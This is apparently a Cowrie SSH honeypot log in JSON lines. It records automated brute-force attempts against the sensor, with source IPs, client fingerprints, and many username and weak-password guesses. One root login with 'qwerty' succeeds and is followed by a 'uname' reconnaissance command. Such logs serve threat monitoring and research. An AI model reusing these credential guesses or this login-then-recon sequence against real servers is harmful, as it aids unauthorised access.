{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:31:50.290144Z","src_ip":"212.227.235.229","session":"af71731c6083"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:31:50.590969Z","src_ip":"212.227.235.229","session":"af71731c6083"}
{"eventid":"cowrie.login.failed","username":"vcsa","password":"12345","message":"login attempt [vcsa/12345] failed","sensor":"my-vps","timestamp":"2025-08-31T06:31:51.836602Z","src_ip":"212.227.235.229","session":"af71731c6083"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60212,"dst_ip":"1.2.3.4","dst_port":22,"session":"5f7024fe1f67","protocol":"ssh","message":"New connection: 212.227.125.160:60212 (1.2.3.4:22) [session: 5f7024fe1f67]","sensor":"my-vps","timestamp":"2025-08-31T06:31:51.862683Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:31:52.259709Z","src_ip":"212.227.125.160","session":"5f7024fe1f67"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:31:52.260481Z","src_ip":"212.227.125.160","session":"5f7024fe1f67"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:31:53.139279Z","src_ip":"212.227.235.229","session":"af71731c6083"}
{"eventid":"cowrie.login.success","username":"root","password":"qwerty","message":"login attempt [root/qwerty] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:31:53.721737Z","src_ip":"212.227.235.229","session":"fa9491b95ec4"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"welcome","message":"login attempt [tomcat/welcome] failed","sensor":"my-vps","timestamp":"2025-08-31T06:31:53.814386Z","src_ip":"212.227.125.160","session":"5f7024fe1f67"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:31:55.270626Z","src_ip":"212.227.125.160","session":"5f7024fe1f67"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54028,"dst_ip":"1.2.3.4","dst_port":22,"session":"90da9b72717b","protocol":"ssh","message":"New connection: 212.227.125.160:54028 (1.2.3.4:22) [session: 90da9b72717b]","sensor":"my-vps","timestamp":"2025-08-31T06:31:56.780884Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:32:14.624370Z","src_ip":"212.227.125.160","session":"90da9b72717b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:32:14.625712Z","src_ip":"212.227.125.160","session":"90da9b72717b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43216,"dst_ip":"1.2.3.4","dst_port":22,"session":"2ef8bae0d478","protocol":"ssh","message":"New connection: 212.227.235.229:43216 (1.2.3.4:22) [session: 2ef8bae0d478]","sensor":"my-vps","timestamp":"2025-08-31T06:32:17.590251Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:32:17.592857Z","src_ip":"212.227.235.229","session":"2ef8bae0d478"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:32:17.803690Z","src_ip":"212.227.235.229","session":"2ef8bae0d478"}
{"eventid":"cowrie.login.failed","username":"oo","password":"oo","message":"login attempt [oo/oo] failed","sensor":"my-vps","timestamp":"2025-08-31T06:32:18.648163Z","src_ip":"212.227.235.229","session":"2ef8bae0d478"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:32:19.863654Z","src_ip":"212.227.235.229","session":"2ef8bae0d478"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:32:23.956650Z","src_ip":"212.227.235.229","session":"fa9491b95ec4"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T06:32:23.957604Z","src_ip":"212.227.235.229","session":"fa9491b95ec4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48108,"dst_ip":"1.2.3.4","dst_port":22,"session":"e62b9dffb288","protocol":"ssh","message":"New connection: 212.227.235.229:48108 (1.2.3.4:22) [session: e62b9dffb288]","sensor":"my-vps","timestamp":"2025-08-31T06:32:29.906997Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:32:30.618339Z","src_ip":"212.227.235.229","session":"e62b9dffb288"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:32:30.619106Z","src_ip":"212.227.235.229","session":"e62b9dffb288"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"7.5","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 7.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:32:31.411525Z","src_ip":"212.227.235.229","session":"fa9491b95ec4"}
{"eventid":"cowrie.session.closed","duration":"66.7","message":"Connection lost after 66.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:32:31.412724Z","src_ip":"212.227.235.229","session":"fa9491b95ec4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49212,"dst_ip":"1.2.3.4","dst_port":22,"session":"7bf824acc07b","protocol":"ssh","message":"New connection: 212.227.235.229:49212 (1.2.3.4:22) [session: 7bf824acc07b]","sensor":"my-vps","timestamp":"2025-08-31T06:32:32.208364Z"}
{"eventid":"cowrie.client.version","version":"\u0000\u0000\u0004T","message":"Remote SSH version: \u0000\u0000\u0004T","sensor":"my-vps","timestamp":"2025-08-31T06:32:32.221884Z","src_ip":"212.227.235.229","session":"7bf824acc07b"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:32:32.223155Z","src_ip":"212.227.235.229","session":"7bf824acc07b"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"123qwe","message":"login attempt [oracle/123qwe] failed","sensor":"my-vps","timestamp":"2025-08-31T06:32:36.728251Z","src_ip":"212.227.125.160","session":"90da9b72717b"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"abc123","message":"login attempt [tomcat/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T06:32:36.902718Z","src_ip":"212.227.235.229","session":"e62b9dffb288"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34666,"dst_ip":"1.2.3.4","dst_port":22,"session":"e2083f8d2ec1","protocol":"ssh","message":"New connection: 212.227.235.229:34666 (1.2.3.4:22) [session: e2083f8d2ec1]","sensor":"my-vps","timestamp":"2025-08-31T06:32:37.717721Z"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:32:38.653060Z","src_ip":"212.227.235.229","session":"e62b9dffb288"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":12523,"dst_ip":"1.2.3.4","dst_port":22,"session":"b5512e344433","protocol":"ssh","message":"New connection: 80.94.95.15:12523 (1.2.3.4:22) [session: b5512e344433]","sensor":"my-vps","timestamp":"2025-08-31T06:32:42.780514Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T06:32:42.781610Z","src_ip":"80.94.95.15","session":"b5512e344433"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T06:32:42.832878Z","src_ip":"80.94.95.15","session":"b5512e344433"}
{"eventid":"cowrie.login.failed","username":"odoo","password":"odoo","message":"login attempt [odoo/odoo] failed","sensor":"my-vps","timestamp":"2025-08-31T06:32:43.125520Z","src_ip":"80.94.95.15","session":"b5512e344433"}
{"eventid":"cowrie.login.failed","username":"odoo","password":"admin","message":"login attempt [odoo/admin] failed","sensor":"my-vps","timestamp":"2025-08-31T06:32:44.179102Z","src_ip":"80.94.95.15","session":"b5512e344433"}
{"eventid":"cowrie.login.failed","username":"odoo","password":"abc123","message":"login attempt [odoo/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T06:32:45.233150Z","src_ip":"80.94.95.15","session":"b5512e344433"}
{"eventid":"cowrie.login.failed","username":"odoo","password":"abcd123","message":"login attempt [odoo/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-31T06:32:46.286596Z","src_ip":"80.94.95.15","session":"b5512e344433"}
{"eventid":"cowrie.login.failed","username":"odoo","password":"abcd1234","message":"login attempt [odoo/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-31T06:32:47.340052Z","src_ip":"80.94.95.15","session":"b5512e344433"}
{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:32:48.393771Z","src_ip":"80.94.95.15","session":"b5512e344433"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38102,"dst_ip":"1.2.3.4","dst_port":22,"session":"fcc8b7179128","protocol":"ssh","message":"New connection: 212.227.125.160:38102 (1.2.3.4:22) [session: fcc8b7179128]","sensor":"my-vps","timestamp":"2025-08-31T06:32:51.595474Z"}
{"eventid":"cowrie.session.closed","duration":"55.0","message":"Connection lost after 55.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:32:51.762962Z","src_ip":"212.227.125.160","session":"90da9b72717b"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:32:52.060890Z","src_ip":"212.227.125.160","session":"fcc8b7179128"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:32:52.061546Z","src_ip":"212.227.125.160","session":"fcc8b7179128"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:32:52.083522Z","src_ip":"212.227.235.229","session":"e2083f8d2ec1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:32:52.085905Z","src_ip":"212.227.235.229","session":"e2083f8d2ec1"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"abc123","message":"login attempt [tomcat/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T06:32:53.905959Z","src_ip":"212.227.125.160","session":"fcc8b7179128"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:32:55.474007Z","src_ip":"212.227.125.160","session":"fcc8b7179128"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"123qwe","message":"login attempt [oracle/123qwe] failed","sensor":"my-vps","timestamp":"2025-08-31T06:33:10.443946Z","src_ip":"212.227.235.229","session":"e2083f8d2ec1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60374,"dst_ip":"1.2.3.4","dst_port":22,"session":"05dd80d88338","protocol":"ssh","message":"New connection: 212.227.235.229:60374 (1.2.3.4:22) [session: 05dd80d88338]","sensor":"my-vps","timestamp":"2025-08-31T06:33:12.283522Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:33:12.284573Z","src_ip":"212.227.235.229","session":"05dd80d88338"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:33:12.607673Z","src_ip":"212.227.235.229","session":"05dd80d88338"}
{"eventid":"cowrie.login.failed","username":"git","password":"123!@#qweQWE","message":"login attempt [git/123!@#qweQWE] failed","sensor":"my-vps","timestamp":"2025-08-31T06:33:13.939885Z","src_ip":"212.227.235.229","session":"05dd80d88338"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:33:15.264622Z","src_ip":"212.227.235.229","session":"05dd80d88338"}
{"eventid":"cowrie.session.closed","duration":"38.0","message":"Connection lost after 38.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:33:15.743952Z","src_ip":"212.227.235.229","session":"e2083f8d2ec1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37596,"dst_ip":"1.2.3.4","dst_port":22,"session":"51511ed4fbe3","protocol":"ssh","message":"New connection: 212.227.235.229:37596 (1.2.3.4:22) [session: 51511ed4fbe3]","sensor":"my-vps","timestamp":"2025-08-31T06:33:23.508642Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47618,"dst_ip":"1.2.3.4","dst_port":22,"session":"b12ee0c780a8","protocol":"ssh","message":"New connection: 212.227.125.160:47618 (1.2.3.4:22) [session: b12ee0c780a8]","sensor":"my-vps","timestamp":"2025-08-31T06:33:24.998820Z"}
